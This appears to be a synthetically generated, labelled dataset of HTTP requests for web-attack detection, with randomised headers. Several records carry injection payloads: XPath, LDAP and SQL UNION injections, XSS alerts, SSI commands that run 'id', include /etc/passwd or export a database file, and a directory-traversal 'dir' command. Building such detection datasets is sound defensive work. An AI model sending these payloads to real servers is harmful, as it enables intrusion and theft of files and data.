Cookie: Oi=29tyj;N9YSFopp=eei;289crrh=emHPjaaaeg6oeiesr
Cookie2: $Version="4"
Date: Mon, 14 Jul 08 01:16:46 UTC
ETag: W/"0TSBrKN@19qGWxFKmS7"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Sat, 27 Jun 09 02:09:30 GMT
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: *
Max-Forwards: 09
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=EC41B5Fc
Range: 89-,46-035533,8-609
Referer: http://www.b51en.st/mnpga.exe
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 6.9; ee-gi; rv:3.4.6) Gecko/30132595
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 3.7 86.20.72.23, FTP/8.4 123.71.26.255:985
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37878
Start - Id: 50090
class: XPathInjection
PUT /olDvOeajiacrsae/iPt6tehtv/tQNtOJe1vE@Yg6/z@1./hlthnbB998KcjO/neo3oeigeiwRESaxalxy/mj.U/lILGBNShc1eg.php? HTTP/1.1
Content-Length: 220
Content-Language: safwteEb
Content-Encoding: gzip
Content-Location: /onde.asmx
Content-MD5: bGF0Y25pZXNlZG56aWFvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 22:09:42 CET
Last-Modified: Tue, 22 Nov 05 19:00:13 GMT
Host: www.amsp.biz
Connection: close
Accept: image/*, audio/*
Accept-Charset: windows-1258, x-mac-roman;q=0.8
Accept-Encoding: 
Accept-Language: rwjgrgn-dddfny7, f-d;q=0.5, r-ma, pb-bmiE2bo;q=0.1, hiNaaac-ti;q=0.5
Cache-Control: max-stale
Client-ip: 187.202.192.82
Cookie: tj_s1Ea=1sws'    or     1<  nnt/een1/at/child::text()[position()=072]  or    'errxwo'   = '
Cookie2: $Version="50"
Date: Thu, 25 Nov 04 22:08:28 GMT
ETag: "h2ntYS_PIagTaRIj"
Expect: uSist
If-Modified-Since: Sat, 30 Aug 08 07:10:15 GMT
If-Unmodified-Since: Thu, 15 Dec 05 01:29:51 UTC
If-Match: "7KD3e8j78Gd@iiWlV"
If-None-Match: *
If-Range: *
Max-Forwards: 466
MIME-Version: 6.3
Pragma: qds=teswot6w
Proxy-Authorization: iina0E u2nmigt=TcO1ctyp
Authorization: Basic eGNydWhkZWE6bmZNdHJ0Ng==
Range: 691-,389-4,344185-683
Referer: http://te6sD.gov/ter2Ajp/SnhtSjfL/aoriNo0h.cfm
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 8.7; tr-ok; rv:3.2.9) Gecko/33394287
UA-CPU: 68000
UA-Disp: 534,2890,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4253x311
Via: FTP/9.0 www.eateI.png, 3.8 68.155.85.192
Transfer-Encoding: compress
Upgrade: abzn/6.6, djoIix/7.9, 1moNsy/4.9, Avqok5/6.5, pan/8.3
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
X-Serial-Number: 42303
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9dfih=44&rhl=evWWs34z&esvjr8a51mq=216878434&onnnnrieppte=wlssmmhoiW&adup1ic8deoA=tjmu&E@0xgaKAL=aanthnra&rKscript1t7Se=Nmb8n3easeq&69xIou=63062&eecga=iptAr&fuopstIVEue=0375727095&seJt7da2esra8ie=7&Q0AyLJcopyobject= oenac

End - Id: 50090
Start - Id: 48403
class: XPathInjection
GET /5NGireplace1OCZFntmpTK/T3bweieJ0lcrcSarTdoo/1Uj/suif6/26/b6Pj41XoLUmeI/oOh09y5CkDL4k_a/fh/selectP8z/encPeTvhCIc3D6cvGA-/u3lrciTnbyonas.nsf?hesteNnrbrnqtaa=tTw0&9Ttqtrm=gnrialw6eaw87au&nocvoothwt6n=etye+&Lh=ao&ho2ran0=asnyshe%3E&naoiecjv7aheR=624596&Aoe9Ctetfteodai=d.dS&knzoecR5=jFoFkz&8qnhow5sIse=a0ox44u56s9%2Fd&wsgmcerbnanm=i8w%26%26dhregenns%26&kX_eh=97330 HTTP/1.0
Host: 170.138.6.85
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.3, koi8, iso-8859-15;q=0.8, windows-1252, isiri-3342
Accept-Encoding: 
Accept-Language: jviwSne2-hf, ewseuhf-rudoe
Cache-Control: max-stale
Client-ip: 141.232.236.46
Cookie: b6ahcmRm=aysock_streamu;ersa=hkgtd'     or  ei/c1Hrt/child::node()[processing-instruction()=4]  or 'nsmgh'= ';nz6veintd6d=ieemSj n;mtwnxem=reihfgedftex
Cookie2: $Version="774"
Date: Thu, 01 Apr 04 12:15:11 UTC
ETag: W/"3JZKHMWjRGs1-oN_n7"
Expect: 100-continue
From: eeaee7@feroe.net
If-Modified-Since: Sat, 24 Jan 04 14:51:11 CET
If-Unmodified-Since: Thu, 18 Jan 07 01:52:50 UTC
If-Match: "C69Ht0Uo3UbO5P0mCxwm"
If-None-Match: "8m4tjaRbc2fzdCwCu"
If-Range: Sun, 01 Feb 04 19:15:21 CET
Max-Forwards: 73
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c25yc3Npbjp0RWVlaA==
Authorization: Digest opaque="iboi"
Range: 32-
Referer: http://www.3mioec.de/shstf/Ndrc/ua5e/eaUg/eyradn.asp
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: sgisajxFtb (uY0QHdQS5; 11xYYdQO-.; hCSIlzr; eR8Ym5ct8; iAwPFjAUT)
UA-CPU: Sparc
UA-Disp: 533,709,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 141x150
Via: 0.9 84.224.192.23, 1.3 www.ztss.png:1, FTP/1.6 39.242.90.92
Transfer-Encoding: gzip
Upgrade: mcnU/5.9
Warning: 697 www.tnvqh2e6.htm "e6errrusNrmas" "Sun, 18 Jan 09 24:57:04 UTC"
X-Forwarded-For: 204.231.177.22
X-Serial-Number: 344502670791536
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48403
Start - Id: 41524
class: SqlInjection
POST /metaru6rLent/rEcq_SKLpG5Aq-gEFo/055e/UdmcYvG85mochaNENe/x62ahttpsshutdownUt3r3/yTMusreenbahs.js? HTTP/1.1
Content-Length: 158
Content-Language: etnbdn,tAAiesqs,5zen
Content-Encoding: identity
Content-Location: /ozodr/r9hrice.msf
Content-MD5: Z3N0ZWVhd2M4YUxpYW9UdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Sep 06 23:19:19 UTC
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: www.ktMsee.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: s8-ertTarwk;q=0.6, B-8smbdaYn;q=0.2, utlcOu-ncnb
Cache-Control: no-store
Client-ip: 1.117.126.196
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="16"
Date: Thu, 18 Aug 05 21:07:00 UTC
ETag: W/"bX0Vg3Kd8@oR3w41"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sun, 04 May 08 12:24:05 CET
If-Unmodified-Since: Mon, 10 Apr 06 23:38:34 CET
If-Match: *
If-None-Match: "3xUBxLd5HYz4MbKBl_"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.8
Pragma: hbrsrw=a
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM aXJ5OGV2b2Vvb3JzeWlvdGFpNXJtbkVpbnM3ZUV0bGRsd29jc2RpZWF0
Range: 911566-290,4666-98
Referer: http://8c9h.uk/soteo/lpcsO5/LolOiaP/oatn3/tlahI7t.cfm
TE: gzip
Trailer: User-Agent
User-Agent: aHgpVDg http://www.aooyantn.uk
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

ojnspajtwxrnB=7686&ane=1550438&eim7q='   )    UNION ALL SELECT    '8sevGev',206,0677,'ish',87 FROM    oeviasatu WHERE   (  '' ='

End - Id: 41524
Start - Id: 48351
class: XPathInjection
GET /rkL0joHhnZs7FP/niN9raWcutgodyoSd/dGelient1tdnEpe4o/roubwwnRPxi3CcjBoP.tiff? HTTP/1.1
Host: www.ztcloot.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: sdd9wj-itaoIe50, fugesam-tgtfp4n;q=0.7
Cache-Control: min-fresh=155
Client-ip: 89.227.169.249
Cookie: fpnhsUnEmir=shtNi(
Cookie2: $Version="4"
Date: Fri, 02 Jul 04 11:26:05 UTC
ETag: "FJnd@gDFrU9vaMIl"
Expect: 5kOh80fg
From: aloit2ef@imcvhU.st
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Sat, 24 Mar 07 11:32:42 UTC
If-Match: "_H1Lt2uFcWJ5mcELY7a"
If-None-Match: "YljhjA4_bsutmLl"
If-Range: *
Max-Forwards: 9024
MIME-Version: 4.9
Pragma: ene4dtcO='m8os'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: Digest uri=http://umbr1.fr/nrsaietE/clor.zip
Range: -579124,02412-
Referer: /oitzr/5sevt/stmot/sufehea/oi3orqza.msf
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: eciynlt'   or    6     < count(path/child::*)     or    'siht' =   '
UA-Color: color32
UA-Pixels: 784x5970
Via: 1.0 www.ew5jhn.png, 8.8 www.iet6.htm, 6.2 79.65.180.171:97
Transfer-Encoding: gzip
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48351
Start - Id: 47697
class: XSS
GET /u5samoptVxQlgxp_W0aR/sK2YpN3LSxEKhsm9g4/tY/aR5An/1r/xmlqprocessing-instruction/oE/JLSBU7.9likeC6/XF4xp_Rj/jmjaoHrstes2mn.exe?p5hiatiewectucO=5594861&taz=86998693&6FQYlLKrmxTK=i&Mr=tparctppk+%2B+%28&tH=%29r9&Isedea=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+++%3E%5Balert+++%28%27r9plmn%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&migstlrhbwneh=5 HTTP/1.0
Host: www.iitnu.it
Connection: eherah
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5, compress, gzip, gzip, gzip
Accept-Language: *
Cache-Control: max-age=9217
Client-ip: 29.159.169.244
Cookie: we3eoe2raectd=4
Cookie2: $Version="67"
Date: Sun, 16 Nov 08 05:21:21 CET
ETag: "eymgqpKzdWID58x"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 16 Apr 04 11:22:25 UTC
If-Unmodified-Since: Sun, 08 May 05 02:15:13 GMT
If-Match: "mTx35NdR4gl6h3AkUb_3"
If-None-Match: "rU@.2AWJWkPMQAD3"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic dG9wczppd25PSWllYw==
Range: 834-
Referer: http://xS4P.fr/pttrpoes/zpcksice.conf
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.9 (X11; U; SunOS sun4u 4.1; aA-tn; rv:7.6.5) Gecko/53921108
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: eo6rT; aceaAthf=wueou9
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47697
Start - Id: 37881
class: LdapInjection
GET /nHaacEaatw8pcinoeiip/rbeauts/3GZnUMJj_TWZrCYLH/waDMCNJAVb7LRbDi/-k9Ihavingf%uwOZ.css?seunulttt=%29++%28++%7C++++%28cn%3D*o++++%27brien*++%29%28mail+++%3D*o+++%27brien*%29+&tttxtt0oaE=ee&ogorwfeaUe7rEa=5000377&Zmbdehm4deaeaut=iaf7icaenfUne&nMmexec=ahO&shbz=9640&2ehe8oeemoehe=5orlhejFal&titutuan=t-nCMe9&66=3713&the=Eb9&0axtermaXhcatstylercp=1&bsonp9nfd6eolc=asnebNt6A7mlo0h HTTP/1.0
Host: www.0ttt.org
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: windows-1258;q=0.7, x-mac-korean;q=0.8, x-mac-ce, iso-8859-5, euc-cn
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.218.205.150
Cookie: jTe2aw=dFLCZVZ3-
Cookie2: $Version="4"
Date: Thu, 25 Jun 09 17:18:23 GMT
ETag: W/"f6rJoig5_jWofff_Gc"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Wed, 14 Apr 10 14:30:35 CET
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "JwGYAFjSnIbrcn2i7"
If-None-Match: "9UGBLAZArJfiwy-@VG5t"
If-Range: *
Max-Forwards: 0727
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Basic dG5vZnF0OmllZWc=
Range: 41-534098,-55
Referer: http://otkann.org/iurij/dLlspiPI/ohnvd2a.tiff
TE: trailers
Trailer: If-Modified-Since
User-Agent: EQso8 (a4Qwa@li; s@zBu93-; a1uymo; t3AX9umVus)
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 7.6 146.14.202.143, FTP/5.8 www.tEsa.jpg, FTP/3.1 www.mudpfo.jpg
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37881
Start - Id: 44234
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.riimauoT6.st
Connection: wlts
Accept: text/xml, image/gif;q=0.3
Accept-Charset: iso-8859-2, koi8-r, gb2312;q=0.6, windows-1254, iso-8859-1;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: a-aq, mlt-giws;q=0.4, sux-neddrDno;q=0.7
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Tue, 06 Sep 05 04:19:06 GMT
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Sat, 06 Feb 10 14:14:44 GMT
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: "9MutcHvrPBwBNQjs4@m"
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 8364
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 0-3876
Referer: /ttantnr.jpg
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: eatn2n
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: identity
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44234
Start - Id: 39922
class: SSI
PUT /leoedahowcxaetEmt7/n6-z0GyeBfT0i/vLEdatgTvtrSxi4lg/erAb@r0/eab5PacRf/mgaiGgvlee5dr.css? HTTP/1.0
Content-Length: 249
Content-Language: mttee,ncIiris
Content-Encoding: deflate
Content-Location: /rAfh0sa/eraie.rar
Content-MD5: NkFNSW9rdWFoeWVvZ29FdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Feb 07 01:48:11 GMT
Last-Modified: Fri, 04 Apr 08 22:24:54 UTC
Host: 173.47.38.61
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, compress;q=0.8, compress;q=0.6
Accept-Language: aio-ssoe
Cache-Control: min-fresh=906
Client-ip: 239.36.31.16
Cookie: al=4
Cookie2: $Version="724"
Date: Sat, 05 Dec 09 06:10:12 CET
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /cepkeee/mbuo3/huttpz.wmn
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/5.9 (compatible; Rnlhi; Linux i386; t2ncfgnlmi)
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: sptSe
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I8ftp3GRQmlikeY=il&ig4pl=eSzz3v&dinputpsOVL9=<!  #<!--     #exec     cmd="id"-->&vtttsGetCewevo=thuh&nnlRert=rem&M03SAP6=71&CformdiWy6r=2i &dttonY=86ioAI41o1S6q6r&yael1Wen3umD=795214163&ky3OSacceptV=ai&oc=htpassse@eeTbodye/cz

End - Id: 39922
Start - Id: 47871
class: XSS
GET /bIfsrtmneMoeo/gTY8Q9Z5uD4VgS/ttsTs/wzaFWq/indcoionjpotideir6t7/j2r5edu4veaaaulvNWie/eEWd8JqqNfbI0/riis/nGSk4wyp@/dttouh/79OAOAplnG/like2.pl?ei=p+r%40+nBe&rheskdaNcpl=+hd&FoSreplaceEYSp@2=98406995&aidtl8e=id7TtdorisjwtsjFt&tRouejncrgm=%29At&-0Wmn0gyG0a9=A%3Eq&tt=si3%27h&eAaL=76472&adrlalersar=%3Cimg+src++++%3D+++%22javascript%3A++++%5Balert+++%28%27ei%27%29%3B%5D+++%22++%3E&tktgni=epe&iuoonne=tpqgMdB3j&lT=+rst+%3Bi HTTP/1.0
Host: 103.90.158.114:80
Connection: keep-alive
Accept: application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, compress, deflate;q=0.1, identity;q=0.3
Accept-Language: ilOtlzr-pub, ihkaa8-i;q=0.3, k-ti;q=0.4
Cache-Control: only-if-cached
Client-ip: 110.70.167.237
Cookie: Xjmailretc8lincludeAE=8jamh +inputlogchp)$oh~sprocessing-instruction;piDLr81sKaon=DUtsf
Cookie2: $Version="528"
Date: Mon, 29 Jun 09 08:07:09 GMT
ETag: W/"IH62gmogst@IrouKoA"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 716
MIME-Version: 9.4
Pragma: ltsOa4ai=3hplmear
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 541-3,060-23987,670-3
Referer: /tunaiI0c/vretisyt.htm
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/8.5 (X11; U; Solaris 8.9; t4-eg; rv:0.4.0) Gecko/30845621
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: Rmveb/7.9 25.177.125.9, 8.6 www.tbr0By.shtml
Transfer-Encoding: identity
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 307 50.130.247.108 "2mlin3oeoesToap" "Mon, 23 Feb 04 03:39:06 GMT"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47871
Start - Id: 38452
class: LdapInjection
GET /sYhqxWd5/wakH2Xu38RmMa6D/trew/insertjOW30/wRBhsPp5aK.htm?Mpkosyje=%29+++%28++%7C+%28displayName%3Dhad*%29++++%28name++++%3D++++had*+++%29%28+mail%3Dhad*+++%29 HTTP/1.1
Host: 149.112.210.49
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: windows-874, iso-8859-4;q=0.0
Accept-Encoding: 
Accept-Language: e-adEt;q=0.1, tn5d-epTea, hlat-y;q=0.1
Cache-Control: max-age=2819
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Thu, 26 May 05 24:24:07 CET
ETag: W/"DYNYlE_..-0XtO8cK"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Tue, 14 Jul 09 01:11:48 GMT
If-Unmodified-Since: Sat, 08 Oct 05 04:38:28 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Jan 10 11:04:23 UTC
Max-Forwards: 3807
MIME-Version: 3.3
Pragma: 9='tGl3bE'
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Basic OTZkbjpqMXVycjlY
Range: 86309-
Referer: http://ltsrsait.cz/cIuo.nsf
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: Twyaaincb
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/2.7 www.newa.css
Transfer-Encoding: identity
Upgrade: f6Ter/0.9
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38452
Start - Id: 40256
class: SSI
POST /rn4hACEQdyXzKOBWU/d8KhU8UacceptgbSin/cq/sgrTd2l76ahkr/eee0tE/sZuYo_Waj_fvjS8zG/gKPtS.css? HTTP/1.1
Content-Length: 217
Content-Language: pnRy
Content-Encoding: gzip
Content-Location: http://ivoto.org/voeoitw.jpeg
Content-MD5: YWdlcm8xaTdzdXY1aG5yaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 10:46:12 CET
Last-Modified: Mon, 21 Dec 09 15:51:01 GMT
Host: 88.190.26.177
Connection: keep-alive
Accept: application/*;q=0.6, video/mpeg;q=0.4, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.1, identity, deflate;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.89.40.249
Cookie: cribrnhh=iuf(r;eoteededsneAn=O@](dSefv;hscbaurmiAxen=brb4itonmagee;insystemmhlog8xg=80896618;Owwwindow.openselect9ih=s1bTDO;ooEee4Qit=4305
Cookie2: $Version="7"
Date: Tue, 22 Mar 05 02:19:59 CET
ETag: "QQY_.zvrgninbUH8uvt"
Expect: eatendv
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 13 May 08 15:33:43 CET
If-Unmodified-Since: Thu, 26 Feb 09 01:56:14 CET
If-Match: "GlwAzh2j02x7122YL.zr"
If-None-Match: *
If-Range: Sun, 10 Aug 08 12:04:25 UTC
Max-Forwards: 88
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Tnh0YVM2YXRsVWFldGduc21lZmlkbm9uZGFpZW5zbk5HSXJ1eDRXaGhr
Authorization: snyr ulfeee=jffaf0t
Range: 7-1281,22479-
Referer: /iNzaSfe/ucetishr.avi
TE: trailers,chunked
User-Agent: CtsotSEaT7frmn
UA-Disp: 3250,7812,32
UA-Color: color16
Via: eia/8.5 66.123.77.252:41, phx/9.2 99.143.231.63
Transfer-Encoding: identity
Upgrade: oNteno/8.5, frtD/2.1, iaoed/8.7
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

8juRrxlgi0earte=fte&eA=<!--     #exec   cmd="c:\progra~1\lel\a4E0\ns.exe  d:\heiebaRs6m\www.reititto.org\etotenao\database.mdb  /x   exporttofoxpro"-->&rrcithAoe=9918&3WcGNaAR=184

End - Id: 40256
Start - Id: 39833
class: SSI
GET /yxY_4YQveDp/oPDfGb/az-2g_wx5Ce7HHchJV12/ae1evalFY6iju/afyq/snN.eLOsD/z1Zlitetmtrn/r.KT5/ehaGNmNUv6tetSai.php3?eatn2o6ohop0=23&lg=form&1nph-2PR=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&FkvHL=6450063&eaditotadc=92911&KR7UYvaDOE=1172&usiaeus=eu HTTP/1.0
Host: 58.207.118.61
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, cp-950;q=0.8, x-mac-korean
Accept-Encoding: 
Accept-Language: iniac-owfto, e-pcA7tdT;q=0.0, n-eruln;q=0.1, um-eiT
Cache-Control: lhr=mirtgrEt
Client-ip: 92.223.213.84
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Cookie2: $Version="00"
Date: Sat, 05 Nov 05 15:04:44 GMT
ETag: "63kQDQpII_6GCiFlfNX"
Expect: 100-continue
If-Modified-Since: Fri, 04 Mar 05 23:53:42 CET
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-Match: *
If-None-Match: "AOtD-Uiw2eZQ-obccV"
If-Range: *
Max-Forwards: 858
MIME-Version: 8.3
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /na1m1ntl.pl
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.2 (compatible; koaav; Win98; cners; oii05EwL)
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3110x4951
Via: 0.5 62.116.87.209:1, sYs/4.8 www.ere7tz.htm
Transfer-Encoding: deflate
Upgrade: rwgy5l/4.0, iih/8.8, itn/2.2
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 46103258544750968619
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39833
Start - Id: 49329
class: XPathInjection
GET /plguPJ/etntce1.aspx?myspeets=kdR%27%5D++++%7C++++P++++%7C++%2F%2Fuser%5B+++name%2Ftext%28%29%3D%275s&3l9hzdt7m5rpuN=9Ct3&cc2vdE-=ut3sttyu0rnh9dExSl&1ab3tday=Osaewsystemrh&3BMxp_.0f=765 HTTP/1.0
Host: 236.207.1.64
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=25649
Client-ip: 23.87.77.7
